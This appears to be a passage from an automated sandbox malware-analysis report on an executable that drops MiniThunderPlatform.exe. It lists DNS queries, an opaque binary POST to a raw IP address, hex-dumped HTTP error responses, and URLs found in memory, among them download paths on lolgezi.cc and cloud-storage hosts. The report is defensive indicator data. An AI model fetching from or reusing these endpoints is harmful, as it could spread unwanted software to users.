Source: global trafficDNS traffic detected: DNS query: pmap.hz.sandai.net
Source: global trafficDNS traffic detected: DNS query: skinx.x1.lolgezi.cc
Source: global trafficDNS traffic detected: DNS query: hub5idx.shub.hz.sandai.net
Source: global trafficDNS traffic detected: DNS query: hubstat.hz.sandai.net
Source: global trafficDNS traffic detected: DNS query: relay.phub.hz.sandai.net
Source: global trafficDNS traffic detected: DNS query: hub5pr.hz.sandai.net
Source: global trafficDNS traffic detected: DNS query: imhub5pr.hz.sandai.net
Source: global trafficDNS traffic detected: DNS query: score.phub.hz.sandai.net
Source: global trafficDNS traffic detected: DNS query: bjbgp01.baidupcs.com
Source: global trafficDNS traffic detected: DNS query: download6.mcloud.139.com
Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 140.206.225.136:80Content-type: application/octet-streamContent-Length: 204Connection: Keep-AliveData Raw: 3c 00 00 00 07 00 00 00 c0 00 00 00 99 88 68 20 9c 43 74 48 97 50 1d f1 2d d5 f4 78 3c 1e b2 2a 11 00 81 15 c0 ec 9d c4 84 c7 f2 5d 2e c5 17 44 1b af a5 d7 4f df 9a e6 1b 81 13 66 8b 8b c3 20 62 d2 f7 f8 9d b7 f4 f7 e7 7d d8 e4 3b 37 fc 98 57 e3 8b 6d f8 a7 fb 4b 6f 91 dd ac 00 83 d3 b9 9b 34 05 24 ce f0 d5 2a 14 7c 75 74 16 82 5a 18 22 c3 3b bb 8f a5 5d 35 26 92 05 6f 6e 84 b6 38 53 ef d3 aa 23 66 e9 6d b6 09 35 42 c5 58 de 33 86 9c 0e 9a 31 65 ed c5 9b a9 44 4d ba 23 91 9d 94 e9 02 81 9b ca d6 9b f0 db 65 31 02 8d 83 9c b4 20 e3 ec d5 c7 c6 be 75 9d d1 85 57 27 00 7d b4 42 21 81 fb f5 dd d5 52 93 a2 61 Data Ascii: <h CtHP-x<*].DOf b};7WmKo4$*|utZ";]5&on8S#fm5BX31eDM#e1 uW'}B!Ra
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: TengineContent-Type: text/htmlContent-Length: 238Connection: keep-aliveDate: Wed, 06 Nov 2024 15:40:22 GMTX-Tengine-Error: You are forbidden to list bucketsVia: cache28.l2cn2656[0,0,403-1280,M], cache40.l2cn2656[1,0], kunlun7.cn7174[13,13,403-1280,M], kunlun3.cn7174[20,0]Ali-Swift-Global-Savetime: 1730907622X-Cache: MISS TCP_MISS dirn:-2:-2X-Swift-Error: orig response 4XX errorX-Swift-SaveTime: Wed, 06 Nov 2024 15:40:22 GMTX-Swift-CacheTime: 1Timing-Allow-Origin: *EagleId: b4a3921717309076222595605eData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 55 52 4c 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1><p>You don't have permission to access the URL on this server.<hr/>Powered by Tengine</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: TengineContent-Type: text/htmlContent-Length: 238Connection: keep-aliveDate: Wed, 06 Nov 2024 15:40:22 GMTX-Tengine-Error: You are forbidden to list bucketsVia: cache28.l2cn2656[0,0,403-1280,M], cache40.l2cn2656[1,0], kunlun7.cn7174[0,0,403-0,H], kunlun3.cn7174[4,0]Age: 0Ali-Swift-Global-Savetime: 1730907622X-Cache: HIT TCP_MEM_HIT dirn:-2:-2X-Swift-SaveTime: Wed, 06 Nov 2024 15:40:22 GMTX-Swift-CacheTime: 1Timing-Allow-Origin: *EagleId: b4a3921717309076229088651eData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 55 52 4c 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1><p>You don't have permission to access the URL on this server.<hr/>Powered by Tengine</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: TengineContent-Type: text/htmlContent-Length: 238Connection: keep-aliveDate: Wed, 06 Nov 2024 15:40:23 GMTX-Tengine-Error: You are forbidden to list bucketsVia: cache27.l2cn3130[43,43,403-1280,M], cache24.l2cn3130[44,0], kunlun7.cn7174[54,54,403-1280,M], kunlun3.cn7174[57,0]Ali-Swift-Global-Savetime: 1730907623X-Cache: MISS TCP_MISS dirn:-2:-2X-Swift-Error: orig response 4XX errorX-Swift-SaveTime: Wed, 06 Nov 2024 15:40:23 GMTX-Swift-CacheTime: 1Timing-Allow-Origin: *EagleId: b4a3921717309076235413592eData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 55 52 4c 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1><p>You don't have permission to access the URL on this server.<hr/>Powered by Tengine</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.9.3.2Date: Wed, 06 Nov 2024 15:40:28 GMTContent-Type: text/htmlContent-Length: 537Connection: keep-aliveETag: "5e673b37-219"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2e 3c 2f 68 31 3e 0a 3c 70 3e 53 6f 72 72 79 2c 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 62 72 2f 3e 0a 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 66 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 74 68 65 6e 20 79 6f 75 20 73 68 6f 75 6c 64 20 63 68 65 63 6b 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 67 69 6e 78 2e 6f 72 67 2f 72 2f 65 72 72 6f 72 5f 6c 6f 67 22 3e 65 72 72 6f 72 20 6c 6f 67 3c 2f 61 3e 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 3c 2f 70 3e 0a 3c 70 3e 3c 65 6d 3e 46 61 69 74 68 66 75 6c 6c 79 20 79 6f 75 72 73 2c 20 6e 67 69 6e 78 2e 3c 2f 65 6d 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>Error</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>An error occurred.</h1><p>Sorry, the page you are looking for is currently unavailable.<br/>Please try again later.</p><p>If you are the system administrator of this resource then you should checkthe <a href="http://nginx.org/r/error_log">error log</a> for details.</p><p><em>Faithfully yours, nginx.</em></p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: TengineContent-Type: text/htmlContent-Length: 238Connection: keep-aliveDate: Wed, 06 Nov 2024 15:40:30 GMTX-Tengine-Error: You are forbidden to list bucketsVia: cache27.l2cn3130[1,0,403-1280,M], cache3.l2cn3130[1,0], kunlun7.cn7174[17,17,403-1280,M], kunlun3.cn7174[19,0]Ali-Swift-Global-Savetime: 1730907630X-Cache: MISS TCP_MISS dirn:-2:-2X-Swift-Error: orig response 4XX errorX-Swift-SaveTime: Wed, 06 Nov 2024 15:40:30 GMTX-Swift-CacheTime: 1Timing-Allow-Origin: *EagleId: b4a3921717309076308173929eData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 55 52 4c 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1><p>You don't have permission to access the URL on this server.<hr/>Powered by Tengine</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.9.3.2Date: Wed, 06 Nov 2024 15:40:35 GMTContent-Type: text/htmlContent-Length: 537Connection: keep-aliveETag: "5e673b37-219"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2e 3c 2f 68 31 3e 0a 3c 70 3e 53 6f 72 72 79 2c 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 62 72 2f 3e 0a 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 66 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 74 68 65 6e 20 79 6f 75 20 73 68 6f 75 6c 64 20 63 68 65 63 6b 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 67 69 6e 78 2e 6f 72 67 2f 72 2f 65 72 72 6f 72 5f 6c 6f 67 22 3e 65 72 72 6f 72 20 6c 6f 67 3c 2f 61 3e 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 3c 2f 70 3e 0a 3c 70 3e 3c 65 6d 3e 46 61 69 74 68 66 75 6c 6c 79 20 79 6f 75 72 73 2c 20 6e 67 69 6e 78 2e 3c 2f 65 6d 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>Error</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>An error occurred.</h1><p>Sorry, the page you are looking for is currently unavailable.<br/>Please try again later.</p><p>If you are the system administrator of this resource then you should checkthe <a href="http://nginx.org/r/error_log">error log</a> for details.</p><p><em>Faithfully yours, nginx.</em></p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: TengineContent-Type: text/htmlContent-Length: 238Connection: keep-aliveDate: Wed, 06 Nov 2024 15:40:38 GMTX-Tengine-Error: You are forbidden to list bucketsVia: cache27.l2cn3130[62,62,403-1280,M], cache61.l2cn3130[67,0], kunlun7.cn7174[82,81,403-1280,M], kunlun3.cn7174[84,0]Ali-Swift-Global-Savetime: 1730907638X-Cache: MISS TCP_MISS dirn:-2:-2X-Swift-Error: orig response 4XX errorX-Swift-SaveTime: Wed, 06 Nov 2024 15:40:38 GMTX-Swift-CacheTime: 1Timing-Allow-Origin: *EagleId: b4a3921717309076386235405e
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, download_engine.dll.7.dr, XLBugHandler.dll.7.dr, MiniThunderPlatform.exe.7.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: MiniThunderPlatform.exe, 0000000E.00000003.1545516600.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csc3-2010-aia.verisig
Source: MiniThunderPlatform.exe, 0000000E.00000002.1614649879.00000000007F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://logo.verisign.c
Source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000003.1722484573.000000000C66C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722583922.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722683050.000000000C67C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722646058.000000000C674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nginx.org/r/error_log
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, download_engine.dll.7.dr, XLBugHandler.dll.7.dr, MiniThunderPlatform.exe.7.drString found in binary or memory: http://ocsp.thawte.com0
Source: MiniThunderPlatform.exe, 0000000E.00000002.1614649879.00000000007F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.ver
Source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000003.1722484573.000000000C66C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722583922.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1723141682.000000000C670000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722815289.000000000C66A000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722839677.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1724450109.000000000C670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBox
Source: MiniThunderPlatform.exe, 0000000F.00000003.1722484573.000000000C66C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722583922.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722683050.000000000C67C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722646058.000000000C674000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1724293363.0000000000BF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBox/
Source: MiniThunderPlatform.exe, 0000000F.00000003.1722646058.000000000C674000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1723825853.0000000000862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBox/%E8%B5%84%E6%BA%90%E4%BF%AE%E5%A4%8D%E5%8C%85_2410
Source: MiniThunderPlatform.exe, 0000000F.00000003.1722484573.000000000C66C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722583922.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1723141682.000000000C670000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722815289.000000000C66A000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722839677.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1724450109.000000000C670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBoxp
Source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlistPhoto
Source: MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000002.1614649879.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000002.1616442401.0000000000C85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webm
Source: MiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webm11J
Source: MiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webm12
Source: MiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webm?
Source: MiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webmM
Source: MiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webma
Source: MiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webms
Source: MiniThunderPlatform.exe, 0000000E.00000002.1614649879.00000000007F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webmtiH
Source: MiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skinx.x1.lolgezi.cc/d/PanAlistPhotocept:
Source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1723428878.0000000000448000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: http://store.paycenter.uc.cn
Source: MiniThunderPlatform.exe, 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1723428878.0000000000448000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: http://store.paycenter.uc.cnmail-attachment.googleusercontent.com
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, download_engine.dll.7.dr, XLBugHandler.dll.7.dr, MiniThunderPlatform.exe.7.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, download_engine.dll.7.dr, XLBugHandler.dll.7.dr, MiniThunderPlatform.exe.7.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, download_engine.dll.7.dr, XLBugHandler.dll.7.dr, MiniThunderPlatform.exe.7.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
Source: MiniThunderPlatform.exe, 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html....................
Source: minizip.dll.7.drString found in binary or memory: http://www.winimage.com/zLibDll
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, minizip.dll.7.drString found in binary or memory: http://www.winimage.com/zLibDll-
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, minizip.dll.7.drString found in binary or memory: http://www.winimage.com/zLibDll1.2.3
Source: MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.xunlei.com/
Source: MiniThunderPlatform.exe, 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.xunlei.com/GET
Source: MiniThunderPlatform.exe, 0000000E.00000002.1618143876.000000000C90C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000002.1617920624.000000000C904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bjbgp01.baidupcs.com/file/0a382c0d6mc9d86e83dea8b6b711ec95?bkt=en-2e2b5030dd6ff03724ec263689
Source: MiniThunderPlatform.exe, 0000000F.00000003.1675363991.000000000C6E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download6.mcloud.139.com
Source: MiniThunderPlatform.exe, 0000000F.00000002.1724450109.000000000C670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download6.mcloud.139.com/storageWeb/servlet
Source: MiniThunderPlatform.exe, 0000000F.00000003.1722646058.000000000C674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download6.mcloud.139.com/storageWeb/servlet/downloadServlet?code=TTIxRDExcUFxWUsyZUE2ODQxN3d
Source: MiniThunderPlatform.exe, 0000000F.00000003.1675363991.000000000C6E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download6.mcloud.139.com3TQ
